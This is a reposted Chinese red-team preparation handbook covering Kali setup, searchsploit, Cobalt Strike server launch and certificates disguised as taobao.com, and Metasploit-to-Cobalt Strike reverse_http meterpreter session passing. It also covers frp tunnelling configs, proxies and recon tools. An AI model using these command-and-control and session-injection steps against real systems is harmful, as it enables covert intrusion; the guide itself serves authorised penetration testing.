红队手册[1]——准备篇

admin 2024年3月10日11:43:37评论20 views字数 6387阅读21分17秒阅读模式

红队手册[1]——准备篇

红队手册[1]——准备篇

兵者,诡道也 

免责声明

我们发布的内容仅作为测试和学习交流,禁止用于未授权场景。任何人不得将其用于非法目的。我方对于阅读本文技术引起的法律责任概不负责。

--->目录<---

0x01——更新源

0x02——(Exploit-DB)漏洞数据库

0x03——cs特性修改

0x04——msf,cs会话互传

0x05——proxychains、burp、software代理

0x06——frp端口转发

0x07——武装google-chrome

0x08——指纹识别

0x09——常规

0x01、原神,启动

--->0x001.更新源

sudo vim /etc/apt/sources.list

#kali官方源 deb http://http.kali.org/kali kali-rolling main non-free contrib#中科大的源 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb http://mirrors.ustc.edu.cn/kali kali-rolling main contrib non-free deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main contrib non-free deb http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free deb-src http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free#阿里云 deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib#清华大学 deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free  deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free #浙大 deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free  deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free #东软大学 deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib  deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib

红队手册[1]——准备篇

apt-get update 更新索引apt-get upgrade 更新软件apt-get dist-upgrade 升级 (不推荐)apt-get clean 删除缓存包apt-get autoclean 删除未安装的deb包
0x02、漏洞数据库

--->0x001.更新漏洞数据库

searchsploit -u        #更新漏洞数据库searchsploit -h        #查看使用帮助searchsploit eternalblue -w    #联网搜索--exclude=  #排除不想要的结果kali@kali:~$ searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"-p   #漏洞利用的完整路径复制到剪贴板-m          #复制exp到当前的工作目录-t          #限制搜索标题 kali@kali:~$ searchsploit -t oracle windows--disable-colour--disable-color #颜色输出

红队手册[1]——准备篇

--->0x002.或者直接官网下

https://www.exploit-db.com/ 

红队手册[1]——准备篇

0x03、cs特性修改

--->0x001.cs启动

#windows服务端启动,需要jdk11以上"C:Program FilesJavajdk-11.0.15.1binjava.exe" -jar cat_server.jar 192.168.152.128 123456#windows客户端启动"C:Program FilesJavajdk-11.0.15.1binjava.exe" -jar cat_client.jar client#Linux启动服务端:1、sudo update-alternatives --config java #切换jdk11以上2、cd /root/tools/cs4_5/cat_server3、java -jar cat_server.jar server server 192.168.152.128 123456 jquery-c2.4.5.profile -keytool -keystore cobaltstrike.store keytool -list -v -keystore cobaltstrike.store  #默认密码123456回车。启动CSC2Profile只是影响后续的操作,不用重启CS

--->0x002.cs证书 (linux keytool)

1、#自定义cobaltstrike.storekeytool -list -v -keystore cobaltstrike.store  #默认密码1234562、#生成新的cobaltstrike.store证书keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias taobao.com -dname "CN=US, OU=”taobao.com“, O=“Sofatest”, L=Beijing, ST=Cyberspace, C=CN"-keytool -keystore cobaltstrike.store -storepass 密码-keypass 密码-genkey -keyalg RSA-alias google.com -dname "CN=(名字与姓氏),OU=(组织单位名称), O=(组织名称),L=(城市或区域名称),ST=(州或省份名称),C=(单位的两字母国家代码)替换原来的cobaltstrike.store证书,放到CS根目录。  3、#启用证书:keytool -importkeystore -srckeystore cobaltstrike.store -destkeystore cobaltstrike.store -deststoretype pkcs124、#查看新证书:发现有多条就删除cobaltstrike.store重新生成keytool -list -v -keystore cobaltstrike.store

红队手册[1]——准备篇

--->0x003.cs证书 (Windows keytool)

#先cdcs服务端所在目录(如果没有配jdk11以上),默认密码:123456C:toolsCScat_server>"C:Program FilesJavajdk-11.0.15.1binkeytool.exe"  -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias taobao.com -dname "CN=US, OU=”taobao.com“, O=“Sofatest”, L=Beijing, ST=Cyberspace, C=CN"

红队手册[1]——准备篇

0x04、msf,cs会话互传

--->0x001.msf传cs

use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_httpset lhost ip    #CS ipset lport port   #CS 端口set session 1   #要转发的sessionset prependmigrate true     #可忽略set DisablePayloadHandler true  #用来禁用payload handler的监听否则有冲突run/exploit -j

--->0x002.csmsf

use exploit/multi/handler set set payload windows/meterpreter/reverse_httpset lhost ipset lport portexploit
0x05、代理

--->0x001.proxychains socks5代理

vim /etc/proxychains.conf

红队手册[1]——准备篇

代理检查

curl ipinfo.io

代理启动*

proxychains firefoxgoogle-chrome --proxy-server="socks5://127.0.0.1:9050"

--->0x002.burp上层代理

红队手册[1]——准备篇

--->0x003.终端代理

终端代理:export http_proxy="socks5://127.0.0.1:9050"export https_proxy="socks5://127.0.0.1:9050"# 取消代理$ unset http_proxy$ unset https_proxy
0x06、frp端口转发

--->0x001.配置与启动

服务端启动:root@kali:~/Desktop/frp# ./frpc -c frpc.ini#服务端frp配置:[common]bind_port = 9070token = ldsdsd1>lsjewdf@@1#客户端frp配置:root@kali:~/Desktop/frp# more frpc.ini [common]server_addr = vps server_port = 9070token = lauNkus7$21>lsjf!2ds[s1]type = tcplocal_ip = 127.0.0.1local_port = 80remote_port = 80[s2]type = tcplocal_ip = 127.0.0.1local_port = 8081remote_port = 8081
0x07、Google Chrome

--->0x001.安装与启动

# wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb# apt install ./google-chrome-stable_current_amd64.deb# google-chrome --no-sandbox       /启动谷歌浏览器

--->0x002.插件

Hack-ToolsOWASP Penetration Testing Kit   Proxy SwitchyOmega     #代理ShodanWappalyzer    #指纹识别HackBarfindsomething
0x08、指纹识别

--->0x001.kscan

#单个url指纹识别./kscan_linux_amd64 -t http://www.xxx.com --check -o xxx.xx.xxx.xxx.csv   -o保存 --check 指纹#文件批量指纹识别./kscan_linux_amd64 -t xxx.xx.xxx.xxx_url.txt --check -o xxx.xx.xxx.xxx.csv 

--->0x002.Ehole

1.本地识别:EHole -l url.txt   //URL地址需带上协议,每行一个2.FOFA识别:注意:从FOFA识别需要配置FOFA 密钥以及邮箱,在config.ini内配置好密钥以及邮箱即可使用。EHole -f 192.168.1.1/24  //支持单IP或IP段3.结果输出:EHole -l url.txt -json export.json  //结果输出至export.json文件
0x09、常规命令

--->0x001.开启ssh

---------------------------------------------------------------------vi /etc/ssh/sshd_config  PasswordAuthentication yes 取消掉注释  permitrootlogin yes  添加/etc/init.d/ssh restart 或者 service ssh start 重启sshupdate-rc.d ssh enable  开机启动---------------------------------------------------------------------

--->0x002.定时任务

直接编辑文件:nano /etc/crontabcrontab -e    #编辑定时任务,或者nano /etc/crontabcrontab -l    #查看任务列表crontab -r    #删除当前所有定时任务/etc/init.d/cron start/stop/restart/reload #启动/停止/重启/重新加载 crontab服务chkconfig  --list crond         #查看crond是否开机自动启动chkconfig  --level 35 crond on  #设置crond开机自动启动*/4 *   * * *   root    /home/Tool/httpslow/httpslow.sh &#每4分钟执行#新创建的cron job,不会马上执行,至少要过2分钟才执行。如果重启cron则马上执行。tail -f /var/log/cron #查看日志保存:ctrl + x

--->0x003.VM共享文件夹挂载

挂在共享文件夹不显示:1.卸载挂载:sudo umount /mnt/hgf2.重新挂载(根据uid):sudo /usr/bin/vmhgfs-fuse .host:/ /mnt/hgfs -o allow_other -o uid=1000 -o gid=1000 -o umask=0223.返回/mnt/hgfs中的/mnt目录。再进入/hgfs 即可发现挂载目录

红队手册[1]——准备篇

--->0x004.tcpdump抓包

tcpdump -i eth0 -vnn host 10.1.1.45//抓取包含10.1.1.45的数据包 (eth0根据实际情况)tcpdump -i eth0 -vnn src host 10.1.1.45//抓取源地址是10.1.1.45数据包tcpdump -i eth0 -vnn dst host 10.1.1.45//抓取目的地址是10.1.1.45数据包tcpdump -i eth0 -vnn src port 22//抓取源端口是22的数据包tcpdump -i any -vnn src port 80 //抓任意源端口是80的数据包tcpdump -i eth0 -vnn dst port 22//抓取目的端口是22的数据包保存抓完的包tcpdump -i eth0 -vnn src host 10.1.1.45 //抓取源地址是10.1.1.45数据包-w 文件a//把抓完的包保存到文件a中-c 数量//抓数据包的数量tcpdump –i eth0 -vnn -w /tmp/fil1 -c 100//把抓取的数据包记录存到/tmp/fill文件中,当抓取100个数据包后就退出程序

原文始发于微信公众号(513 Sec):红队手册[1]——准备篇

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月10日11:43:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红队手册[1]——准备篇http://cn-sec.com/archives/2558193.html

发表评论

匿名网友 填写信息